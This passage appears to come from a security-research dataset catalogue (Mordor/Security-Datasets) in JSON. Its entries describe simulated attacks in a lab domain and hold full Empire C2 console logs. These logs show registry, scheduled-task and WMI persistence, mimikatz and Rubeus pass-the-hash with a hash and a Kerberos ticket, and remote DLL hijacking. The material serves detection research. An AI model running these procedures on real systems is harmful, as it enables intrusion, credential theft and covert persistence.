[y/N] y\n[*] Tasked KU86XWEL to run TASK_CMD_WAIT\n[*] Agent KU86XWEL tasked with task ID 1\n[*] Tasked agent KU86XWEL to run module powershell/persistence/userland/registry\n(Empire: powershell/persistence/userland/registry) > \nRegistry persistence established using listener http stored in HKCU:Software\\Microsoft\\Windows\\CurrentVersion\\Debug.\n\n(Empire: powershell/persistence/userland/registry) > \n(Empire: powershell/persistence/userland/registry) > \n[*] Sending POWERSHELL stager (stage 1) to 172.18.39.5\n[*] New agent SP7B3U2X checked in\n[+] Initial agent SP7B3U2X from 172.18.39.5 now active (Slack)\n[*] Sending agent (stage 2) to SP7B3U2X at 172.18.39.5\n\n(Empire: powershell/persistence/userland/registry) > agents\n\n[*] Active agents:\n\nName La Internal IP Machine Name Username Process PID Delay Last Seen Listener\n---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------\nKU86XWEL ps 172.18.39.5 WORKSTATION5 THESHIRE\\pgustavo powershell 5376 5/0.0 2020-09-04 07:07:17 http \nSP7B3U2X ps 172.18.39.5 WORKSTATION5 THESHIRE\\pgustavo powershell 1376 5/0.0 2020-09-04 07:09:04 http \n\n(Empire: agents) > interact SP7B3U2X\n(Empire: SP7B3U2X) > shell whoami\n[*] Tasked SP7B3U2X to run TASK_SHELL\n[*] Agent SP7B3U2X tasked with task ID 1\n(Empire: SP7B3U2X) > \ntheshire\\pgustavo\n..Command execution completed.\n\n (Empire: SP7B3U2X) >"}, "references": null}, "SDWIN-190319024742": {"title": "Empire Userland Scheduled Tasks", "id": "SDWIN-190319024742", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2019/03/19", "modification_date": "2020/09/20", "platform": ["Windows"], "type": "atomic", "tags": ["Local Scheduled Tasks"], "description": "This dataset represents adversaries creating and/or executing local scheduled tasks to maintain persistence in an environment.", "attack_mappings": [{"technique": "T1053", "sub-technique": "005", "tactics": ["TA0003"]}], "notebooks": null, "files": [{"type": "Host", 
"link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/persistence/host/empire_schtasks_creation_standard_user.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "schtasks", "script": "https://github.com/EmpireProject/Empire/blob/dev/data/module_source/persistence/Persistence.psm1"}], "permissions_required": ["User"], "adversary_view": "(Empire: stager/multi/launcher) > agents\n\n[*] Active agents:\n\nName La Internal IP Machine Name Username Process PID Delay Last Seen Listener\n---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------\nA7BWPR32 ps 172.18.39.5 WORKSTATION5 *THESHIRE\\pgustavo powershell 5904 5/0.0 2020-09-18 18:29:36 http \nHBEW9G1D ps 172.18.39.6 WORKSTATION6 THESHIRE\\sbeavers powershell 6036 5/0.0 2020-09-18 18:15:39 http \nUF5MYK42 ps 172.18.39.5 WORKSTATION5 *THESHIRE\\pgustavo powershell 6404 5/0.0 2020-09-20 21:28:07 http \n\n3MWPS8L6 ps 172.18.39.5 WORKSTATION5 THESHIRE\\pgustavo powershell 7312 5/0.0 2020-09-21 07:12:36 http \n\n(Empire: agents) > interact 3MWPS8L6 \n(Empire: 3MWPS8L6) > usemodule persistence/userland/schtasks\n(Empire: powershell/persistence/userland/schtasks) > info\n\n Name: Invoke-Schtasks\n Module: powershell/persistence/userland/schtasks\n NeedsAdmin: False\n OpsecSafe: False\n Language: powershell\nMinLanguageVersion: 2\n Background: False\n OutputExtension: None\n\nAuthors:\n @mattifestation\n @harmj0y\n\nDescription:\n Persist a stager (or script) using schtasks. This has a\n moderate detection/removal rating.\n\nComments:\n https://github.com/mattifestation/PowerSploit/blob/master/Pe\n rsistence/Persistence.psm1\n\nOptions:\n\n Name Required Value Description\n ---- -------- ------- -----------\n Agent True 3MWPS8L6 Agent to run module on. \n Listener False Listener to use. \n Obfuscate False False Switch. 
Obfuscate the launcher \n powershell code, uses the \n ObfuscateCommand for obfuscation types. \n For powershell only. \n ObfuscateCommand False Token\\All\\1 The Invoke-Obfuscation command to use. \n Only used if Obfuscate switch is True. \n For powershell only. \n AMSIBypass False True Include mattifestation's AMSI Bypass in \n the stager code. \n AMSIBypass2 False False Include Tal Liberman's AMSI Bypass in \n the stager code. \n DailyTime False 09:00 Daily time to trigger the script \n (HH:mm). \n IdleTime False User idle time (in minutes) to trigger \n script. \n TaskName True Updater Name to use for the schtask. \n RegPath False HKCU:\\Software\\Microsoft Registry location to store the script \n \\Windows\\CurrentVersion\\ code. Last element is the key name. \n debug \n ADSPath False Alternate-data-stream location to store \n the script code. \n ExtFile False Use an external file for the payload \n instead of a stager. \n Cleanup False Switch. Cleanup the trigger and any \n script from specified location. \n UserAgent False default User-agent string to use for the staging\n request (default, none, or other). \n Proxy False default Proxy to use for request (default, none,\n or other). \n ProxyCreds False default Proxy credentials \n ([domain\\]username:password) to use for \n request (default, none, or other). \n\n(Empire: powershell/persistence/userland/schtasks) > set Listener http\n(Empire: powershell/persistence/userland/schtasks) > set TaskName MordorSchtask\n(Empire: powershell/persistence/userland/schtasks) > execute\n[>] Module is not opsec safe, run? 
[y/N] y\n[*] Tasked 3MWPS8L6 to run TASK_CMD_WAIT\n[*] Agent 3MWPS8L6 tasked with task ID 1\n[*] Tasked agent 3MWPS8L6 to run module powershell/persistence/userland/schtasks\n(Empire: powershell/persistence/userland/schtasks) > \nSUCCESS: The scheduled task \"MordorSchtask\" has successfully been created.\nSchtasks persistence established using listener http stored in HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\debug with MordorSchtask daily trigger at 09:00."}, "references": null}, "SDWIN-190319131123": {"title": "Empire Over-Pass-The-Hash", "id": "SDWIN-190319131123", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2019/03/19", "modification_date": "2020/09/20", "platform": ["Windows"], "type": "atomic", "tags": ["Over-Pass-The-Hash", "Patching LSASS"], "description": "This dataset represents adversaries taking a hash/key (rc4_hmac, aes256_cts_hmac_sha1, etc.) for a domain-joined user into a fully-fledged Kerberos TGT. In this case, an adversary can write the hash/key into an existing logon session (i.e. 
a sacrificial logon session) section in the memory content of LSASS and kick off the regular Kerberos authentication process.", "attack_mappings": [{"technique": "T1550", "sub-technique": "002", "tactics": ["TA0005", "TA0008"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/empire_over_pth_patch_lsass.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "mimikataz_pth", "script": "https://github.com/OTRF/Blacksmith/blob/master/aws/Security-Datasets/cfn-files/scripts/Invoke-Mimikatz.ps1"}], "permissions_required": ["Administrator"], "adversary_view": "(Empire: stager/multi/launcher) > agents\n\n[*] Active agents:\n\nName La Internal IP Machine Name Username Process PID Delay Last Seen Listener\n---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------\n4EH9PC5S ps 172.18.39.6 WORKSTATION6 *THESHIRE\\wardog powershell 5056 5/0.0 2020-09-22 02:12:12 http \n\n(Empire: agents) > interact 4EH9PC5S\n(Empire: 4EH9PC5S) > \n(Empire: 4EH9PC5S) > usemodule credentials/mimikatz/pth*\n(Empire: powershell/credentials/mimikatz/pth) > info\n\n Name: Invoke-Mimikatz PTH\n Module: powershell/credentials/mimikatz/pth\n NeedsAdmin: True\n OpsecSafe: True\n Language: powershell\nMinLanguageVersion: 2\n Background: True\n OutputExtension: None\n\nAuthors:\n @JosephBialek\n @gentilkiwi\n\nDescription:\n Runs PowerSploit's Invoke-Mimikatz function to execute\n sekurlsa::pth to create a new process. with a specific\n user's hash. Use credentials/tokens to steal the token\n afterwards.\n\nComments:\n http://clymb3r.wordpress.com/ http://blog.gentilkiwi.com\n http://blog.cobaltstrike.com/2015/05/21/how-to-pass-the-\n hash-with-mimikatz/\n\nOptions:\n\n Name Required Value Description\n ---- -------- ------- -----------\n Agent True 4EH9PC5S Agent to run module on. 
\n CredID False CredID from the store to use for ticket \n creation. \n user False Username to impersonate. \n domain False The fully qualified domain name. \n ntlm False The NTLM hash to use. \n\n(Empire: powershell/credentials/mimikatz/pth) > set ntlm 81d310fa34e6a56a31145445891bb7b8\n(Empire: powershell/credentials/mimikatz/pth) > set user pgustavo\n(Empire: powershell/credentials/mimikatz/pth) > set domain theshire.local\n(Empire: powershell/credentials/mimikatz/pth) > execute\n[*] Tasked 4EH9PC5S to run TASK_CMD_JOB\n[*] Agent 4EH9PC5S tasked with task ID 1\n[*] Tasked agent 4EH9PC5S to run module powershell/credentials/mimikatz/pth\n(Empire: powershell/credentials/mimikatz/pth) > \nJob started: 1WCLFA\n\nHostname: WORKSTATION6.theshire.local / S-1-5-21-4228717743-1032521047-1810997296\n\n .#####. mimikatz 2.2.0 (x64) #19041 Aug 10 2020 20:07:46\n.## ^ ##. \"A La Vie, A L'Amour\" - (oe.eo)\n## / \\ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )\n## \\ / ## > http://blog.gentilkiwi.com/mimikatz\n'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )\n '#####' > http://pingcastle.com / http://mysmartlogon.com ***/\n\nmimikatz(powershell) # sekurlsa::pth /user:pgustavo /domain:theshire.local /ntlm:81d310fa34e6a56a31145445891bb7b8\nuser : pgustavo\ndomain : theshire.local\nprogram : cmd.exe\nimpers. 
: no\nNTLM : 81d310fa34e6a56a31145445891bb7b8\n | PID 3148\n | TID 6488\n | LSA Process is now R/W\n | LUID 0 ; 69262895 (00000000:0420de2f)\n \\_ msv1_0 - data copy @ 000001C7E0166C80 : OK !\n \\_ kerberos - data copy @ 000001C7E02B1268\n \\_ aes256_hmac -> null \n \\_ aes128_hmac -> null \n \\_ rc4_hmac_nt OK\n \\_ rc4_hmac_old OK\n \\_ rc4_md4 OK\n \\_ rc4_hmac_nt_exp OK\n \\_ rc4_hmac_old_exp OK\n \\_ *Password replace @ 000001C7E01AEDE8 (32) -> null\n\nUse credentials/token to steal the token of the created PID."}, "references": ["https://github.com/GhostPack/Rubeus#example-over-pass-the-hash", "https://github.com/gentilkiwi/mimikatz/blob/a0f243b33590751a77b6d6f275313a4fe8d42c82/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.c#L566-L600"]}, "SDWIN-190319145126": {"title": "Rubeus Userland ASKTGT PTT", "id": "SDWIN-190319145126", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2019/03/19", "modification_date": "2020/09/21", "platform": ["Windows"], "type": "atomic", "tags": ["Over-Pass-The-Hash", "Not Touching LSASS"], "description": "This dataset represents adversaries crafting raw AS-REQ (TGT request) traffic for a specific user and encryption key (/rc4, /aes128, /aes256, or /des) to request TGTs without touching lsass.", "attack_mappings": [{"technique": "T1003", "sub-technique": "003", "tactics": ["TA0006"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/empire_shell_rubeus_asktgt_ptt.zip"}, {"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/network/empire_shell_rubeus_asktgt_ptt.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "shell", "script": null}, {"type": "binary", "name": "Rubeus", "module": "asktgt", "script": "https://github.com/GhostPack/Rubeus"}], 
"permissions_required": ["User"], "adversary_view": "(Empire: stager/multi/launcher) > agents\n\n[*] Active agents:\n\nName La Internal IP Machine Name Username Process PID Delay Last Seen Listener\n---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------\n4EH9PC5S ps 172.18.39.6 WORKSTATION6 *THESHIRE\\wardog powershell 5056 5/0.0 2020-09-22 02:12:12 http \n\n(Empire: agents) > interact 4EH9PC5S\n(Empire: 4EH9PC5S) > \n(Empire: 4EH9PC5S) > shell C:\\users\\sbeavers\\Desktop\\Rubeus.exe asktgt /user:pgustavo /rc4:81d310fa34e6a56a31145445891bb7b8 /ptt\n[*] Tasked 4EH9PC5S to run TASK_SHELL\n[*] Agent 4EH9PC5S tasked with task ID 2\n(Empire: 4EH9PC5S) > \n______ _ \n (_____ \\ | | \n _____) )_ _| |__ _____ _ _ ___ \n | __ /| | | | _ \\| ___ | | | |/___)\n | | \\ \\| |_| | |_) ) ____| |_| |___ |\n |_| |_|____/|____/|_____)____/(___/\n\n v1.5.0 \n\n[*] Action: Ask TGT\n\n[*] Using rc4_hmac hash: 81d310fa34e6a56a31145445891bb7b8\n[*] Building AS-REQ (w/ preauth) for: 'theshire.local\\pgustavo'\n[+] TGT request successful!\n[*] base64(ticket.kirbi):\n\n doIFPjCCBTqgAwIBBaEDAgEWooIETTCCBElhggRFMIIEQaADAgEFoRAbDlRIRVNISVJFLkxPQ0FMoiMw\n IaADAgECoRowGBsGa3JidGd0Gw50aGVzaGlyZS5sb2NhbKOCBAEwggP9oAMCARKhAwIBAqKCA+8EggPr\n SCmXhrxOqig5LjU/zlOxxj72iV0Io1vDNrnEHqq0hTNheiEb2Oz3yOEk3Ct6qioIJmjm/PE+MoazpfNa\n DOQUkxLNyEti0ltIyI2I2docI0yIbXA8BNRrGojFdruBcOs5NdDfi2Ttsng+NcZzWmCH4D3amx7AjOMr\n jRotAieTg98Uzt3AG03bQSlPNkLJCW/Pnz5YCE8I8zIrkkGH+mTA+mGg4cNeVJE38nOlShq0meRMKKxC\n drFfzsCgJ64r9dVBP+LmegRcUbrPLv6d2UHc+k0ELbhhfHgiy5m06UaLfrAe8fiUcHsdN0cJ1+4f9KCL\n NsbjXJN85QQGzdOFFjJ07hir+SZ1UU+0NSaOkbFHz178KMk2P/9yWT9UqTEHV2qXuHS4scCV5SQirH6b\n HAWlEpqeEwh+yGUmhLGs8Jo9sBsNEQ6EdFUzA+JjD4itQa4IMgLSLNEwzkZOle85Jbw4kDFsFmtckKVu\n 1osdI7dxA9wM/dZElOVUiI2cYqbI+pOcyPJHuzhbYnVhUhKFi29ZxPe1an0T7tNoy1zCFSs0z3V5RKwZ\n 4eUVQVxYGspUbB4h21/zEbus+NGTzWtJMqb6L4abOj1iLiRgJagyFKk5h91fasaRUoVAo3VxiIbrPqfh\n 
kH393T/SC9ZObPESkBY8FVvhs/kuqRZIIhflbdYsTdcp0sa/F7Mo90CREIhH3EqgIQ/e97eK1Z9fr3Ma\n HGfFBEEYcHIm28FQU3gtyMFTSp9gswbq3YtsOMGF5oLY8Po6vAdhHV2wStV9FDPVPepT4USsZGYZ567p\n 40PiSGBRUmCevWqrIA5kNwKD8QvaefXrGLZ+oXes9dt3CqHENQ4pJN67gUZq/F5tfFWYwDkefjNWMOwY\n lIAEvyxrxlnA8ouBkvkLSkz4jYMjUCstdJ7TiF/GMboXAX1kfQpv01sMV/39RdSaE4s6aTGlqX2vDShM\n OSdwfSS4qTU8kTkWuKgUh/Fcs2jYbjKfDvOqfkY5fAf+JSPRwqBC4mhsoGDLd3XGFba7prlV0VopSymj\n //ZpVE70a2VJazJHuHoS1ZWvNVILQwF0FteGc5UYQHPMlAC7v6Qr360g8mHv9PG6AS7dHb3WWnezaRV7\n ByPSxZ2B/WHEYWROuXlAK+dKWKWU31/NK6rX8l4Re8OUeu4/lGoEwZikKWxs+jE1zSOww46iZA78zJ3u\n QVeK8t90Z28pxwRX8mo2/PfnOEFwVJMsrBSiwLrLFDbjGqCX8ktaZ1ZTxcXLYu8mfDvCs9KAUMRvncBH\n g5yHUuoX6dIAY6EhWmpeSmqwV5VCV1kUarhKJt+JTC3Yjg9FaPGkJlJae6OB3DCB2aADAgEAooHRBIHO\n fYHLMIHIoIHFMIHCMIG/oBswGaADAgEXoRIEEGTttXVs0y3nHHWU3quEoDChEBsOVEhFU0hJUkUuTE9D\n QUyiFTAToAMCAQGhDDAKGwhwZ3VzdGF2b6MHAwUAQOEAAKURGA8yMDIwMDkyMjAyMzkxM1qmERgPMjAy\n MDA5MjIxMjM5MTNapxEYDzIwMjAwOTI5MDIzOTEzWqgQGw5USEVTSElSRS5MT0NBTKkjMCGgAwIBAqEa\n MBgbBmtyYnRndBsOdGhlc2hpcmUubG9jYWw=\n[+] Ticket successfully imported!\n\n ServiceName : krbtgt/theshire.local\n ServiceRealm : THESHIRE.LOCAL\n UserName : pgustavo\n UserRealm : THESHIRE.LOCAL\n StartTime : 9/21/2020 10:39:13 PM\n EndTime : 9/22/2020 8:39:13 AM\n RenewTill : 9/28/2020 10:39:13 PM\n Flags : name_canonicalize, pre_authent, initial, renewable, forwardable\n KeyType : rc4_hmac\n Base64(key) : ZO21dWzTLeccdZTeq4SgMA==\n\n..Command execution completed.\n\n(Empire: 4EH9PC5S) >"}, "references": ["https://github.com/GhostPack/Rubeus#example-over-pass-the-hash"]}, "SDWIN-190403133337": {"title": "IKEEXT Remote Service DLL Hijack", "id": "SDWIN-190403133337", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2019/04/03", "modification_date": "2020/09/20", "platform": ["Windows"], "type": "atomic", "tags": ["Remote Service DLL Hijacking", "RPC over SMB Svcctl"], "description": "This dataset represents adversaries copying a file remotely to replace a file which 
is executed by a service that is vulnerable to DLL hijack. This dataset includes", "attack_mappings": [{"technique": "T1574", "sub-technique": "001", "tactics": ["TA0003", "TA0004", "TA0005"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/empire_shell_dcerpc_smb_service_dll_hijack.zip"}, {"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/empire_shell_dcerpc_smb_service_dll_hijack.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "manual", "script": null}], "permissions_required": ["Administrator"], "adversary_view": "(Empire: agents) > usestager windows/dll\n(Empire: stager/windows/dll) > info\nName: DLL Launcher\n\nDescription:\n Generate a PowerPick Reflective DLL to inject with\n stager code.\n\nOptions:\n\n Name Required Value Description\n ---- -------- ------- -----------\n Listener True http Listener to use.\n Language True powershell Language of the stager to generate.\n Arch True x64 Architecture of the .dll to generate\n (x64 or x86).\n StagerRetries False 0 Times for the stager to retry\n connecting.\n UserAgent False default User-agent string to use for the staging\n request (default, none, or other).\n Proxy False default Proxy to use for request (default, none,\n or other).\n ProxyCreds False default Proxy credentials\n ([domain\\]username:password) to use for\n request (default, none, or other).\n OutFile True /tmp/wlbsctrl.dll File to output dll to.\n Obfuscate False False Switch. 
Obfuscate the launcher\n powershell code, uses the\n ObfuscateCommand for obfuscation types.\n For powershell only.\n ObfuscateCommand False Token\\All\\1 The Invoke-Obfuscation command to use.\n Only used if Obfuscate switch is True.\n For powershell only.\n AMSIBypass False True Include mattifestation's AMSI Bypass in\n the stager code.\n AMSIBypass2 False False Include Tal Liberman's AMSI Bypass in\n the stager code.\n ScriptLogBypass False True Include cobbr's Script Block Log Bypass\n in the stager code.\n ETWBypass False False Include tandasat's ETW bypass in the\n stager code.\n\n(Empire: stager/windows/dll) > back\n(Empire: agents) > agents\n\n[*] Active agents:\n\n Name La Internal IP Machine Name Username Process PID Delay Last Seen Listener\n ---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------\n GCSKD17Z ps 172.18.39.5 WORKSTATION5 *THESHIRE\\pgustavo powershell 1112 5/0.0 2020-09-22 03:51:02 http \n\n(Empire: agents) > interact GCSKD17Z\n(Empire: GCSKD17Z) >\n(Empire: GCSKD17Z) > upload /tmp/wlbsctrl.dll\n[*] Tasked agent to upload wlbsctrl.dll, 124 KB\n(Empire: GCSKD17Z) > shell COPY .\\wlbsctrl.dll \\\\WORKSTATION6\\C$\\Windows\\System32\\wlbsctrl.dll\n[*] Tasked GCSKD17Z to run TASK_SHELL\n[*] Agent GCSKD17Z tasked with task ID 3\n(Empire: GCSKD17Z) > \n..Command execution completed.\n\n(Empire: GCSKD17Z) > shell sc.exe `\\`\\WORKSTATION6 stop IKEEXT\n[*] Tasked GCSKD17Z to run TASK_SHELL\n[*] Agent GCSKD17Z tasked with task ID 4\n(Empire: GCSKD17Z) > \nSERVICE_NAME: IKEEXT \n TYPE : 30 WIN32 \n STATE : 3 STOP_PENDING \n (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)\n WIN32_EXIT_CODE : 0 (0x0)\n SERVICE_EXIT_CODE : 0 (0x0)\n CHECKPOINT : 0x0\n WAIT_HINT : 0x1388\n\n..Command execution completed.\n\n(Empire: GCSKD17Z) > shell sc.exe `\\`\\WORKSTATION6 query IKEEXT\n[*] Tasked GCSKD17Z to run TASK_SHELL\n[*] Agent GCSKD17Z tasked with task ID 5\n(Empire: GCSKD17Z) > \nSERVICE_NAME: IKEEXT \n TYPE : 20 
WIN32_SHARE_PROCESS \n STATE : 1 STOPPED \n WIN32_EXIT_CODE : 0 (0x0)\n SERVICE_EXIT_CODE : 0 (0x0)\n CHECKPOINT : 0x0\n WAIT_HINT : 0x0\n\n..Command execution completed.\n\n(Empire: GCSKD17Z) > shell sc.exe `\\`\\WORKSTATION6 start IKEEXT\n[*] Tasked GCSKD17Z to run TASK_SHELL\n[*] Agent GCSKD17Z tasked with task ID 6\n(Empire: GCSKD17Z) > \nSERVICE_NAME: IKEEXT \n TYPE : 30 WIN32 \n STATE : 2 START_PENDING \n (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)\n WIN32_EXIT_CODE : 0 (0x0)\n SERVICE_EXIT_CODE : 0 (0x0)\n CHECKPOINT : 0x0\n WAIT_HINT : 0x7d0\n PID : 6172\n FLAGS : \n\n..Command execution completed.\n\n(Empire: GCSKD17Z) >"}, "references": ["https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992"]}, "SDWIN-190518182022": {"title": "Empire VBS Execution", "id": "SDWIN-190518182022", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2019/05/18", "modification_date": "2020/09/20", "platform": ["Windows"], "type": "atomic", "tags": ["VBS Script Execution"], "description": "This dataset represents adversaries executing a VBS script as a launcher for initial access.", "attack_mappings": [{"technique": "T1059", "sub-technique": "005", "tactics": ["TA0002"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/execution/host/empire_launcher_vbs.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "launcher", "script": "https://github.com/BC-SECURITY/Empire/blob/master/lib/stagers/windows/launcher_vbs.py"}], "permissions_required": ["User"], "adversary_view": "(Empire: listeners) > usestager windows/launcher_vbs\n(Empire: stager/windows/launcher_vbs) > info\n\nName: VBS Launcher\n\nDescription:\n Generates a .vbs launcher for Empire.\n\nOptions:\n\n Name Required Value Description\n ---- -------- ------- -----------\n Listener True Listener to generate stager for.\n 
Language True powershell Language of the stager to generate.\n StagerRetries False 0 Times for the stager to retry\n connecting.\n OutFile False /tmp/launcher.vbs File to output .vbs launcher to,\n otherwise displayed on the screen.\n Obfuscate False False Switch. Obfuscate the launcher\n powershell code, uses the\n ObfuscateCommand for obfuscation types.\n For powershell only.\n ObfuscateCommand False Token\\All\\1 The Invoke-Obfuscation command to use.\n Only used if Obfuscate switch is True.\n For powershell only.\n UserAgent False default User-agent string to use for the staging\n request (default, none, or other).\n Proxy False default Proxy to use for request (default, none,\n or other).\n ProxyCreds False default Proxy credentials\n ([domain\\]username:password) to use for\n request (default, none, or other).\n\n\n(Empire: stager/windows/launcher_vbs) > set Listener http\n(Empire: stager/windows/launcher_vbs) > execute\n\n[*] Stager output written out to: /tmp/launcher.vbs\n\n(Empire: stager/windows/launcher_vbs) > \n[*] Sending POWERSHELL stager (stage 1) to 172.18.39.5\n[*] New agent K47LRAEP checked in\n[+] Initial agent K47LRAEP from 172.18.39.5 now active (Slack)\n[*] Sending agent (stage 2) to K47LRAEP at 172.18.39.5\n\n(Empire: stager/windows/launcher_vbs) > agents\n\n[*] Active agents:\n\nName La Internal IP Machine Name Username Process PID Delay Last Seen Listener\n---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------\nK47LRAEP ps 172.18.39.5 WORKSTATION5 THESHIRE\\pgustavo powershell 2316 5/0.0 2020-09-04 20:10:07 http \n\n(Empire: agents) > interact K47LRAEP\n(Empire: K47LRAEP) > \n(Empire: K47LRAEP) > shell whoami\n[*] Tasked K47LRAEP to run TASK_SHELL\n[*] Agent K47LRAEP tasked with task ID 1\n(Empire: K47LRAEP) > \ntheshire\\pgustavo\n..Command execution completed.\n\n(Empire: K47LRAEP) > \n(Empire: K47LRAEP) > "}, "references": null}, "SDWIN-190518184306": {"title": "Empire Elevated WMI Eventing", "id": 
"SDWIN-190518184306", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2019/05/18", "modification_date": "2020/09/20", "platform": ["Windows"], "type": "atomic", "tags": ["Local WMI Eventing", "WMI Event Subscriptions"], "description": "This dataset represents adversaries leveraging WMI subscriptions locally for persistence.", "attack_mappings": [{"technique": "T1546", "sub-technique": "003", "tactics": ["TA0003", "TA0004"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/persistence/host/empire_wmi_local_event_subscriptions_elevated_user.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "wmi", "script": "https://github.com/EmpireProject/Empire/blob/dev/data/module_source/persistence/Persistence.psm1"}], "permissions_required": ["Administrator"], "adversary_view": "(Empire: powershell/privesc/bypassuac_fodhelper) > agents\n[*] Active agents:\n\nName La Internal IP Machine Name Username Process PID Delay Last Seen Listener\n---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------\n28BNF7RH ps 172.18.39.5 WORKSTATION5 *THESHIRE\\pgustavo powershell 5392 5/0.0 2020-09-04 20:31:17 http \nW2TBCPHU ps 172.18.39.5 WORKSTATION5 THESHIRE\\pgustavo powershell 5584 5/0.0 2020-09-04 20:42:01 http \n13ZK6G7M ps 172.18.39.5 WORKSTATION5 *THESHIRE\\pgustavo powershell 5676 5/0.0 2020-09-04 20:41:59 http \n\n(Empire: agents) > interact 13ZK6G7M\n(Empire: 13ZK6G7M) > \n(Empire: 13ZK6G7M) > usemodule persistence/elevated/wmi*\n(Empire: powershell/persistence/elevated/wmi) > info\n\n Name: Invoke-WMI\n Module: powershell/persistence/elevated/wmi\n NeedsAdmin: True\n OpsecSafe: False\n Language: powershell\nMinLanguageVersion: 2\n Background: False\n OutputExtension: None\n\nAuthors:\n @mattifestation\n @harmj0y\n @jbooz1\n\nDescription:\n Persist a stager (or script) using a 
permanent WMI\n subscription. This has a difficult detection/removal rating.\n\nComments:\n https://github.com/mattifestation/PowerSploit/blob/master/Pe\n rsistence/Persistence.psm1\n\nOptions:\n\n Name Required Value Description\n ---- -------- ------- -----------\n Agent True 13ZK6G7M Agent to run module on. \n Listener True http Listener to use. \n DailyTime False Daily time to trigger the script \n (HH:mm). \n AtStartup False True Switch. Trigger script (within 5 \n minutes) of system startup. \n FailedLogon False Trigger script with a failed logon \n attempt from a specified user \n SubName True Updater Name to use for the event subscription. \n ExtFile False Use an external file for the payload \n instead of a stager. \n Cleanup False Switch. Cleanup the trigger and any \n script from specified location. \n UserAgent False default User-agent string to use for the staging\n request (default, none, or other). \n Proxy False default Proxy to use for request (default, none,\n or other). \n ProxyCreds False default Proxy credentials \n ([domain\\]username:password) to use for \n request (default, none, or other). \n\n(Empire: powershell/persistence/elevated/wmi) > execute\n[>] Module is not opsec safe, run? 
[y/N] y\n[*] Tasked 13ZK6G7M to run TASK_CMD_WAIT\n[*] Agent 13ZK6G7M tasked with task ID 1\n[*] Tasked agent 13ZK6G7M to run module powershell/persistence/elevated/wmi\n(Empire: powershell/persistence/elevated/wmi) > \nWMI persistence established using listener http with OnStartup WMI subsubscription trigger.\n\n(Empire: powershell/persistence/elevated/wmi) > \n(Empire: powershell/persistence/elevated/wmi) > \n[*] Sending POWERSHELL stager (stage 1) to 172.18.39.5\n[*] New agent PYA28EDF checked in\n[+] Initial agent PYA28EDF from 172.18.39.5 now active (Slack)\n[*] Sending agent (stage 2) to PYA28EDF at 172.18.39.5\n\n(Empire: powershell/persistence/elevated/wmi) > \n(Empire: powershell/persistence/elevated/wmi) > agents\n\n[*] Active agents:\n\nName La Internal IP Machine Name Username Process PID Delay Last Seen Listener\n---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------\n28BNF7RH ps 172.18.39.5 WORKSTATION5 *THESHIRE\\pgustavo powershell 5392 5/0.0 2020-09-04 20:31:17 http \nW2TBCPHU ps 172.18.39.5 WORKSTATION5 THESHIRE\\pgustavo powershell 5584 5/0.0 2020-09-04 20:43:48 http \n13ZK6G7M ps 172.18.39.5 WORKSTATION5 *THESHIRE\\pgustavo powershell 5676 5/0.0 2020-09-04 20:43:48 http \n\nPYA28EDF ps 172.18.39.5 WORKSTATION5 *THESHIRE\\SYSTEM powershell 7480 5/0.0 2020-09-04 20:49:29 http \n\n(Empire: agents) > interact PYA28EDF\n(Empire: PYA28EDF) > shell whoami\n[*] Tasked PYA28EDF to run TASK_SHELL\n[*] Agent PYA28EDF tasked with task ID 1\n(Empire: PYA28EDF) > \nnt authority\\system\n..Command execution completed.\n\n(Empire: PYA28EDF) > \n(Empire: PYA28EDF) >"}, "references": null}, "SDWIN-190518200432": {"title": "Empire PSInject", "id": "SDWIN-190518200432", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2019/05/18", "modification_date": "2020/09/20", "platform": ["Windows"], "type": "atomic", "tags": ["PE Injection", "WriteProcessMemory", "CreateRemoteThread 